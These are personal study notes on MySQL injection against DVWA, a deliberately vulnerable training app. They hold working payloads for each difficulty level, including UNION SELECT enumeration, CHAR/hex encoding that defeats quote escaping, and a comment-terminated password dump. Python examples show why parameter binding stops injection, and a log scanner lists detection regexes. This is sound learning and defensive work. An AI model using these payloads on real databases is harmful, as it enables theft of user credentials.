MySQL injection notes

These are notes I keep for reviewing my own learning process. Since switching input methods is inconvenient, they are written mostly in English;
readers who run into an unfamiliar word, please look it up yourselves. Thanks for reading!
Also, to make them easier for me to look back over, the notes are written in reverse order: the newest content comes first.

MySQL injection

Practice

DVWA-SQLi

http://43.247.91.228:81/login.php
  1. Vulnerability: SQL Injection
  • low
    omitted
  • middle
    There is an escaping step: $id = $_GET['id']; $id = mysql_real_escape_string($id);
    id=1 UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
    Because the number of rows displayed is not limited, everything comes out. A few things to note:
    1. Database and table names such as 'dvwa' must be expressed indirectly, because the quote characters get escaped:
    • CHAR(100, 118, 119, 97)
    • hex encoding: 0x64767761
  • high
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    How to get past the trailing LIMIT? Try commenting it out: tried "--", which did not really work; then "#", which does!
    payload: 'union select first_name,password from users#
  • impossible
    1. Anti-CSRF
    2. id = $_SESSION
    3. PDO parameter binding
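To see why the "middle" level is still injectable although every value is escaped, and why the "impossible" level's parameter binding is the real fix, here is an added example (my own code, not DVWA's). It assumes an in-memory SQLite database as a stand-in for MySQL, a quote-doubling helper as a stand-in for mysql_real_escape_string, and a constructed users table with the column names from the query above; the payload has the shape of the page's middle-level one but reads from users, since SQLite has no INFORMATION_SCHEMA.

```python
import sqlite3

# Constructed sample data standing in for DVWA's users table (assumption: column
# names as in the query on this page, hashes are made-up placeholders).
SAMPLE_USERS = [
    (1, "admin", "admin", "hash_of_admin"),
    (2, "gordonb", "brown", "hash_of_gordonb"),
]


def make_db():
    """In-memory SQLite database used as a stand-in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_quotes(value):
    """Stand-in for mysql_real_escape_string: neutralises single quotes only.

    SQLite escapes a quote by doubling it, MySQL uses a backslash, but the
    point is the same: the function only protects values that sit INSIDE quotes.
    """
    return value.replace("'", "''")


def query_medium(conn, user_id):
    """DVWA 'middle' pattern: escaped value dropped into an UNQUOTED numeric context."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escape_quotes(user_id)}"
    return conn.execute(sql).fetchall()


def query_quoted_escaped(conn, user_id):
    """Escaped value dropped INSIDE quotes: here the escape does its job."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{escape_quotes(user_id)}'"
    return conn.execute(sql).fetchall()


def query_bound(conn, user_id):
    """DVWA 'impossible' pattern: parameter binding, the whole input is one literal."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Constructed payload in the shape of the page's middle-level one. It contains no
# quote character at all, so escaping has nothing to act on.
PAYLOAD = "1 UNION SELECT 1, password FROM users"


def demo():
    """Run the same input through the three query styles and return the rows each one yields."""
    conn = make_db()
    return {
        "medium": query_medium(conn, PAYLOAD),            # leaks the password column
        "quoted_escaped": query_quoted_escaped(conn, PAYLOAD),  # no rows: payload is one string
        "bound": query_bound(conn, PAYLOAD),              # no rows: payload is one parameter
        "bound_legit": query_bound(conn, "1"),            # normal lookup still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Only the "medium" style returns the extra rows; the escape function is not wrong, it is simply applied where there are no quotes for it to protect, which is why binding every parameter is the fix rather than escaping harder.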

Experience

MySQL table structure

Basic steps

  • Python:
    Before use, the injection parameter has to be moved to the TAIL of the URL, i.e.
    from ?id=1%20UNION%20SELECT%201,user()&Submit=Submit# to ?Submit=Submit&id=1%20UNION%20SELECT%201,user()

Result as follows:

  • Programming notes
    1. Python regex
      • re.findall(r'pattern', string)  # extract every match from the string
      • re.match(r'pattern', string)    # match the pattern at the start of the string
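The same two regex calls are just as useful on the defending side. The added example below (my own code, not from the original notes) shows re.match anchoring a parse at the start of a web-server log line and re.findall pulling out every injection indicator from the decoded query string: UNION SELECT, INFORMATION_SCHEMA, CHAR()- and hex-encoded names, and a MySQL comment marker, i.e. exactly the shapes that appear in the payloads above. The log lines are constructed, not real traffic, and the combined-log layout and path names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). The query strings follow the
# shapes seen in these notes: URL-encoded UNION SELECT, CHAR()/hex-encoded names,
# and a '#' comment sent as %23.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1543
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /vulnerabilities/sqli/?Submit=Submit&id=1%20UNION%20SELECT%201,user() HTTP/1.1" 200 1611
10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /vulnerabilities/sqli/?id=1%20UNION%20SELECT%201,TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=0x64767761&Submit=Submit HTTP/1.1" 200 4021
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /vulnerabilities/sqli/?id=1%20UNION%20SELECT%201,TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=CHAR(100,118,119,97)&Submit=Submit HTTP/1.1" 200 4021
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /vulnerabilities/sqli/?id=%27union%20select%20first_name,password%20from%20users%23&Submit=Submit HTTP/1.1" 200 1702
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /about.php?topic=selection HTTP/1.1" 200 812
"""

# Combined-log layout (assumption); named groups keep the fields readable.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators, all with non-capturing groups so findall returns the whole match.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("char_encoded", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("mysql_comment", re.compile(r"#|--\s|/\*")),
]


def parse_line(line):
    """re.match: the layout is anchored at the beginning of the line; None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.partition("?")[2]
    # Decode %20 / %27 / %23 so the indicators are visible in clear text.
    return {"ip": m.group("ip"), "path": path, "query": unquote_plus(query)}


def find_indicators(decoded_query):
    """re.findall: every occurrence of every indicator, as (name, matched_text) pairs."""
    hits = []
    for name, pattern in INDICATORS:
        for found in pattern.findall(decoded_query):
            hits.append((name, found))
    return hits


def scan_log(text):
    """Return one alert per log line whose query string carries at least one indicator."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_indicators(rec["query"])
        if hits:
            alerts.append({
                "ip": rec["ip"],
                "query": rec["query"],
                "indicators": sorted({name for name, _ in hits}),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["indicators"], alert["query"])
```

Decoding before matching matters: the raw log shows `%20UNION%20SELECT`, and a pattern written for `union\s+select` never sees it otherwise. The word boundaries keep ordinary words such as "selection" from firing.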

Reasons for SQLi

  1. User-provided parameters that go straight into the database query WITHOUT filtering: $_GET,
     $_POST,
     $_REQUEST
  2. The query result $result has to be visible to the outside
     > echo($query)
     > echo…